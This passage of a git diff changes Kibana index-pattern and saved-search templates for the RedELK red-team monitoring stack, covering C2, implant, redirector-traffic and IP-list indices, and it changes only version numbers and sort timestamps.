le\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.2", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152843417, 1817], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson index 26767be9..8168a1b5 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.3", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171864697, 18], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.2", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152845450, 1832], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson index e22f399a..e89e95c6 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171866710, 20], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.2", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152847512, 1890], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson index fae91607..608fc015 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171868723, 243], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.2", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642154954544, 16181], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson index 7e78ab03..20cfafce 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171870762, 242], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.2", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642157817846, 34863], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson index 3592c569..a241cb37 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson @@ -1,16 +1,16 @@ -{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 198], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 201], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 209], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", 